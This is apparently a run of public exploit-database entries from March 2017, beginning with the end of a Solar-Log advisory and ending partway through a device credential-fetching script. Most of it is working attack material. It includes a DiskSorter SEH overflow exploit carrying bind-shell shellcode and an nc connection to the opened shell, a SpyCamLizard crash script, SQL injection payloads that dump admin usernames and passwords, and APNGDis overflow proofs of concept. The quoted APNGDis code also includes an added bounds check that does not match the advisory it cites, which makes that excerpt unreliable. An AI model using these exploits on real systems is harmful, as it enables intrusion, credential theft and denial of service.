7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
This action was not tested against the device. Such an attack can brick the
Solar-Log. The worst case scenario would be a botnet exploiting this vulnerability.
A network-dump of the "CHIPTOOL" would be enough to reconstruct the required
UDP packets for the attack.
Vulnerable / tested versions:
-----------------------------
Solar-Log 1200 - 3.5.2-85
Solar-Log 800e - 2.8.4-56
Since the firmware for the other Solar-Log devices is exactly the same,
other devices with the same versions are also prone to the vulnerabilities!
Vendor contact timeline:
------------------------
2017-02-02: Contacting vendor via info@solar-log.com, support@solar-log.com
and berlin@solar-log.com.
2017-02-14: Vendor responds and requests the advisory unencrypted; Sent the
advisory unencrypted to the vendor.
2017-02-20: Asked for an update.
2017-02-21: Vendor states that the patch is in development. The update will
be published before 2017-03-24.
2017-03-14: Asked for a status update. Vendor states that the update will
be available on 2017-03-21.
2017-03-20: Vendor sends release notes. New firmware version is 3.5.3 build
86 for all affected Solar-Log devices.
Informing the vendor that the release of the advisory is set to
2017-03-22.
2017-03-22: Public advisory release.
Solution:
---------
Upgrade to firmware 3.5.3-86
http://www.solar-log.com/de/service-support/downloads/firmware.html
Workaround:
-----------
Restrict network access to the devices.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2017
# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow
Textbook stack buffer overflow: a fixed-size buffer is declared as
szPath[256], and the first command-line argument is copied into it
without length validation.
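/*
 * Entry point of apngdis 2.8 (excerpt as quoted in the advisory; the
 * includes and the remainder of main are not part of this listing).
 *
 * The original copied argv[1] into the 256-byte stack buffer szPath with a
 * bare strcpy, so any longer argument overwrote the stack (CVE-2017-6191).
 * Fix: refuse an input path that does not fit -- strlen() excludes the
 * terminating NUL, so the length must be strictly less than sizeof szPath --
 * before performing the copy.
 *
 * Returns 1 on a usage error or an over-long input path.
 */
int main(int argc, char** argv)
{
  unsigned int i, j;      /* used later in the full program */
  char * szInput;
  char * szOutPrefix;     /* used later in the full program */
  char szPath[256];
  char szOut[256];        /* used later in the full program */
  std::vector frames;     /* element type lost in the advisory excerpt */
  printf("\nAPNG Disassembler 2.8\n\n");
  if (argc > 1)
    szInput = argv[1];
  else
  {
    printf("Usage: apngdis anim.png [name]\n");
    return 1;
  }
  /* Bounds check: reject before copying rather than truncating silently,
     so a path that cannot be represented is reported instead of mangled. */
  if (strlen(szInput) >= sizeof(szPath))
  {
    printf("Error: input path too long (max %u characters)\n",
           (unsigned int)(sizeof(szPath) - 1));
    return 1;
  }
  strcpy(szPath, szInput);
}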
With 'A' * 1000 as argv[1] :
GDB:
Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
106 ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) i r
rax 0x4141414141414141 4702111234474983745
rbx 0x7ffff70ea600 140737338320384
rcx 0x141 321
rdx 0x0 0
rsi 0x7fffffffca40 140737488341568
rdi 0x4141414141414141 4702111234474983745
rbp 0x7fffffffceb0 0x7fffffffceb0
rsp 0x7fffffffc948 0x7fffffffc948
r8 0x4141414141414141 4702111234474983745
r9 0x9 9
r10 0x73 115
r11 0x7fffffffce78 140737488342648
r12 0x555555558c9f 93824992251039
r13 0x7fffffffcec8 140737488342728
r14 0x0 0
r15 0xffffffffffffffff -1
rip 0x7ffff6dd1486 0x7ffff6dd1486 <strlen+38>
eflags 0x10297 [ CF PF AF SF IF RF ]
Valgrind:
==10685== Invalid read of size 1
==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685== by 0x5B711F8: printf (printf.c:33)
==10685== by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685== by 0x10B24E: main (apngdis.cpp:498)
==10685== Address 0x4141414141414141 is not stack'd, malloc'd or
(recently) free'd
==10685==
==10685==
==10685== Process terminating with default action of signal 11 (SIGSEGV)
==10685== General Protection Fault
==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685== by 0x5B711F8: printf (printf.c:33)
==10685== by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685== by 0x10B24E: main (apngdis.cpp:498)
Reading '==10685==
==10685== HEAP SUMMARY:
==10685== in use at exit: 0 bytes in 0 blocks
==10685== total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
==10685==
==10685== All heap blocks were freed -- no leaks are possible
# Exploit Title: APNGDis image width / height Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6193
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6193
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41669.png
In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values:
‰ P N G . . . . . . . . I H D R
89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
. . . . . . . .
00 0F 00 00 00 0F 00 00
^ ^ ^ ^ ^ ^ ^ ^
Valgrind:
Reading '../w_h_chunk_poc.png'...
==10563== Invalid read of size 8
==10563== at 0x4C30260: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edb3c8 is 28,792 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid write of size 8
==10563== at 0x4C30265: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edbad8 is 30,600 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid read of size 8
==10563== at 0x4C30272: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edb3b8 is 28,776 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid read of size 8
==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==10563==
==10563==
==10563== Process terminating with default action of signal 11 (SIGSEGV)
==10563== Access not within mapped region at address 0x0
==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== If you believe this happened as a result of a stack
==10563== overflow in your program's main thread (unlikely but
==10563== possible), you can try to increase the size of the
==10563== main thread stack using the --main-stacksize= flag.
==10563== The main thread stack size used in this run was 8388608.
==10563==
==10563== HEAP SUMMARY:
==10563== in use at exit: 16,777,901 bytes in 10 blocks
==10563== total heap usage: 24 allocs, 14 frees, 16,997,058 bytes allocated
==10563==
==10563== 64 bytes in 2 blocks are definitely lost in loss record 6 of 9
==10563== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423)
==10563== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112)
==10563== by 0x10A24D: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:244)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== LEAK SUMMARY:
==10563== definitely lost: 64 bytes in 2 blocks
==10563== indirectly lost: 0 bytes in 0 blocks
==10563== possibly lost: 0 bytes in 0 blocks
==10563== still reachable: 16,777,837 bytes in 8 blocks
==10563== suppressed: 0 bytes in 0 blocks
==10563== Reachable blocks (those to which a pointer was found) are not shown.
==10563== To see them, rerun with: --leak-check=full --show-leak-kinds=all
==10563==
==10563== For counts of detected and suppressed errors, rerun with: -v
==10563== ERROR SUMMARY: 1028641 errors from 5 contexts (suppressed: 0 from 0)
Segmentation fault
w_h_chunk_poc.png
# Exploit Title: APNGDis chunk size descriptor Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6192
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6192
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41668.png
The PoC contains an IHDR chunk size descriptor of 0xFFFFFFF4
‰ P N G . . . . ÿ ÿ ÿ ô I H D R
89 50 4E 47 0D 0A 1A 0A FF FF FF F4 49 48 44 52
^ ^ ^ ^
Bash:
Reading '../ihdr_chunk_size_poc.png'...
*** Error in `./apngdis': free(): invalid next size (fast): 0x00005556a08d2270 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f932b0adbcb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f932b0b3f96]
/lib/x86_64-linux-gnu/libc.so.6(+0x7778e)[0x7f932b0b478e]
./apngdis(+0x2e2f)[0x55569f636e2f]
./apngdis(+0x324f)[0x55569f63724f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f932b05d2b1]
./apngdis(+0x16ca)[0x55569f6356ca]
Valgrind:
Reading '../ihdr_chunk_size_poc.png'...
==10383== Invalid write of size 4
==10383== at 0x10B502: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:113)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383== Address 0x5ed3370 is 0 bytes after a block of size 0 alloc'd
==10383== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423)
==10383== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383==
==10383== Invalid write of size 1
==10383== at 0x4C330AD: __GI_mempcpy (vg_replace_strmem.c:1518)
==10383== by 0x5B94B0D: _IO_file_xsgetn (fileops.c:1400)
==10383== by 0x5B89AA8: fread (iofread.c:38)
==10383== by 0x10B52B: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:114)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383== Address 0x5ed338c is 28 bytes after a block of size 0 in arena "client"
==10383==
valgrind: m_mallocfree.c:303 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed.
valgrind: Heap block lo/hi size mismatch: lo = 64, hi = 90194313415.
import socket
import sys
# Python 2 script (print statements, str-typed socket data): opens one TCP
# connection, sends a single oversized GET request line, and exits without
# reading a response.
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay
# Date: 2017.03.22
# Exploit Author: Greg Priest
# Version: SpyCamLizard v1.230
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''
print "SpyCamLizard DoS Exploit running!"
host = "192.168.56.1"  # hard-coded target; sys is imported but argv is never read
port = 80
# Request-path layout: 1189 filler bytes, a 4-byte nSEH placeholder, a
# 4-byte SEH placeholder, then 3803 more filler bytes (5000 bytes total).
# The placeholders are literal "BBBB"/"CCCC"; only the length matters here.
overflow = "A" * 1189
nextSEH = "BBBB"
SEH = "CCCC"
overflow2= "D" * 3803
crash = overflow+nextSEH+SEH+overflow2
httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
httpsocket.connect((host,port))
# Observable on the wire: an HTTP/1.0 GET whose path is 5000 bytes of
# repeated A/B/C/D characters -- a straightforward detection signature.
httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n")
httpsocket.close()
print "SpyCamLizard shutted down!"
#!/usr/bin/env python
# Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow (SEH)
# Date: 2017-03-22
# Exploit Author: Daniel Teixeira
# Author Homepage: www.danielteixeira.com
# Vendor Homepage: http://www.disksorter.com
# Software Link: http://www.disksorter.com/setups/disksorterent_setup_v9.5.12.exe
# Version: 9.5.12
# Tested on: Windows 7 SP1 x86
import socket,os,time,struct
# Python 2 script (print statement, str-typed socket data).  Builds one
# 6000-byte GET request, sends it over a single TCP connection, waits a fixed
# 10 seconds and then shells out to nc.
host = "192.168.2.186"  # hard-coded target; not taken from argv
port = 80
#Bad Chars \x00\x09\x0a\x0d\x20"
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00\x09\x0a\x0d\x20" -f python
# Payload bytes as produced by the msfvenom command above, kept verbatim.
shellcode = ""
shellcode += "\xd9\xc0\xd9\x74\x24\xf4\x5e\xbf\xb0\x9b\x0e\xf2\x33"
shellcode += "\xc9\xb1\x53\x31\x7e\x17\x83\xee\xfc\x03\xce\x88\xec"
shellcode += "\x07\xd2\x47\x72\xe7\x2a\x98\x13\x61\xcf\xa9\x13\x15"
shellcode += "\x84\x9a\xa3\x5d\xc8\x16\x4f\x33\xf8\xad\x3d\x9c\x0f"
shellcode += "\x05\x8b\xfa\x3e\x96\xa0\x3f\x21\x14\xbb\x13\x81\x25"
shellcode += "\x74\x66\xc0\x62\x69\x8b\x90\x3b\xe5\x3e\x04\x4f\xb3"
shellcode += "\x82\xaf\x03\x55\x83\x4c\xd3\x54\xa2\xc3\x6f\x0f\x64"
shellcode += "\xe2\xbc\x3b\x2d\xfc\xa1\x06\xe7\x77\x11\xfc\xf6\x51"
shellcode += "\x6b\xfd\x55\x9c\x43\x0c\xa7\xd9\x64\xef\xd2\x13\x97"
shellcode += "\x92\xe4\xe0\xe5\x48\x60\xf2\x4e\x1a\xd2\xde\x6f\xcf"
shellcode += "\x85\x95\x7c\xa4\xc2\xf1\x60\x3b\x06\x8a\x9d\xb0\xa9"
shellcode += "\x5c\x14\x82\x8d\x78\x7c\x50\xaf\xd9\xd8\x37\xd0\x39"
shellcode += "\x83\xe8\x74\x32\x2e\xfc\x04\x19\x27\x31\x25\xa1\xb7"
shellcode += "\x5d\x3e\xd2\x85\xc2\x94\x7c\xa6\x8b\x32\x7b\xc9\xa1"
shellcode += "\x83\x13\x34\x4a\xf4\x3a\xf3\x1e\xa4\x54\xd2\x1e\x2f"
shellcode += "\xa4\xdb\xca\xda\xac\x7a\xa5\xf8\x51\x3c\x15\xbd\xf9"
shellcode += "\xd5\x7f\x32\x26\xc5\x7f\x98\x4f\x6e\x82\x23\x7e\x33"
shellcode += "\x0b\xc5\xea\xdb\x5d\x5d\x82\x19\xba\x56\x35\x61\xe8"
shellcode += "\xce\xd1\x2a\xfa\xc9\xde\xaa\x28\x7e\x48\x21\x3f\xba"
shellcode += "\x69\x36\x6a\xea\xfe\xa1\xe0\x7b\x4d\x53\xf4\x51\x25"
shellcode += "\xf0\x67\x3e\xb5\x7f\x94\xe9\xe2\x28\x6a\xe0\x66\xc5"
shellcode += "\xd5\x5a\x94\x14\x83\xa5\x1c\xc3\x70\x2b\x9d\x86\xcd"
shellcode += "\x0f\x8d\x5e\xcd\x0b\xf9\x0e\x98\xc5\x57\xe9\x72\xa4"
shellcode += "\x01\xa3\x29\x6e\xc5\x32\x02\xb1\x93\x3a\x4f\x47\x7b"
shellcode += "\x8a\x26\x1e\x84\x23\xaf\x96\xfd\x59\x4f\x58\xd4\xd9"
shellcode += "\x7f\x13\x74\x4b\xe8\xfa\xed\xc9\x75\xfd\xd8\x0e\x80"
shellcode += "\x7e\xe8\xee\x77\x9e\x99\xeb\x3c\x18\x72\x86\x2d\xcd"
shellcode += "\x74\x35\x4d\xc4"
#Buffer overflow
junk = "A" * 2487  # filler preceding the SEH record, per the author's offset
#JMP Short = EB 05
nSEH = "\x90\x90\xEB\x05" #Jump short 5
#POP POP RET (libspp.dll)
SEH = struct.pack('<L',0x10015FFE)  # little-endian 32-bit address in the module named above
#Generated by mona.py v2.0, rev 568 - Immunity Debugger
egg = "w00tw00t"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#NOPS
nops = "\x90"
#Payload
# The trailing nops term pads the payload to exactly 6000 bytes, so the
# request path is always the same length regardless of shellcode size.
payload = junk + nSEH + SEH + egghunter + nops * 10 + egg + shellcode + nops * (6000 - len(junk) - len(nSEH) - len(SEH) - len(egghunter) - 10 - len(egg) - len(shellcode))
#HTTP Request
# Note: no space separates the payload from "HTTP/1.1", so the version token
# is glued to the path.  A 6000-byte GET path is a clear IDS/WAF signature.
request = "GET /" + payload + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"
# The name `socket` is rebound from the module to the socket object here; the
# module is not referenced again, so this only hurts readability.
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect((host,port))
socket.send(request)
socket.close()
print "Waiting for shell..."
time.sleep(10)  # fixed delay; nothing verifies that the request was accepted
os.system("nc " + host + " 4444")  # port 4444 is the bind port of the msfvenom payload above
# # # # #
# Exploit Title: GLink Word Link Script v1.2.3 - SQL Injection
# Google Dork: N/A
# Date: 22.03.2017
# Vendor Homepage: http://www.tufat.com/
# Software: http://www.tufat.com/wp-content/uploads/sites/4/2015/zips/script_131.zip
# Demo: http://www.tufat.com/glink-word-link-script/
# Version: 1.2.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/url.php?id=[SQL]
# -1'+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pass),9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-
# http://localhost/[PATH]/get_words.php?gid=[SQL]
# -1'+union+select+1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+glink_admin_users--+-&step=3
# http://localhost/[PATH]/get_words.php?wid=[SQL]
# -1'+union+select+1,2,concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-&gid=1&step=3
# Etc...
# # # # #
# # # # #
# Exploit Title: Joomla! Component Extra Search v2.2.8 - SQL Injection
# Google Dork: N/A
# Date: 21.03.2017
# Vendor Homepage: http://www.joomlaboat.com/
# Software: http://www.joomlaboat.com/extra-search
# Demo: http://www.joomlaboat.com/
# Version: 2.2.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_extrasearch&view=details&listing_id=1&establename=[SQL]
# http://localhost/[PATH]/index.php?option=com_extrasearch&controller=createusers&establename=[SQL]
# # # # #
================
get-user-info.py
================
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
def make_requests():
    """Calls request functions sequentially.

    Issues the single request made by request_ip(); on success prints the
    decoded body and closes the response.  Failures are ignored silently.
    """
    # One-element list so request_ip() can hand the response object back.
    response = [None]
    responseText = None
    if(request_ip(response)):
        # Success, possibly use response.  Note that "success" includes any
        # HTTP error response that carries a status code (see request_ip).
        responseText = read_response(response[0])
        print responseText
        response[0].close()
    else:
        # Failure, cannot use response.
        pass
def read_response(response):
    """Return the body of an HTTP response, decoding it when compressed.

    Only two Content-Encoding values are handled: 'gzip' and raw 'deflate'
    (no zlib header).  Any other encoding, or none, is returned as read.
    """
    encoding = response.info().get('Content-Encoding')
    raw = response.read()
    if encoding == 'gzip':
        return gzip.GzipFile(fileobj=StringIO(raw)).read()
    if encoding == 'deflate':
        inflater = zlib.decompressobj(-zlib.MAX_WBITS)
        return inflater.decompress(raw) + inflater.flush()
    return raw
def request_ip(response):
    """Tries to request the URL. Returns True if the request was successful; false otherwise.
    http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10
    response -- After the function has finished, will possibly contain the response to the request.

    "Successful" means any HTTP response was received: an HTTPError that
    carries a .code is stored in response[0] and True is returned.  The
    request sends no session cookie (only Language=en), so a 200 for this
    path without prior authentication appears to be what the script probes.
    """
    response[0] = None
    try:
        # Create request to URL.
        import sys
        # Target host comes from argv[1]; a missing argument raises
        # IndexError, which the bare except below turns into a silent False.
        ip = sys.argv[1]
        print ip
        req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10"% ip)
        # Set request headers.  The Referer imitates the device login page.
        req.add_header("Connection", "keep-alive")
        req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
        req.add_header("X-Requested-With", "XMLHttpRequest")
        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
        req.add_header("Referer", "http://%s/www/login.html"% ip)
        req.add_header("Accept-Encoding", "gzip, deflate, sdch")
        req.add_header("Accept-Language", "en-US,en;q=0.8")
        req.add_header("Cookie", "Language=en")
        # Get response to request.
        response[0] = urllib2.urlopen(req)
    except urllib2.URLError, e:
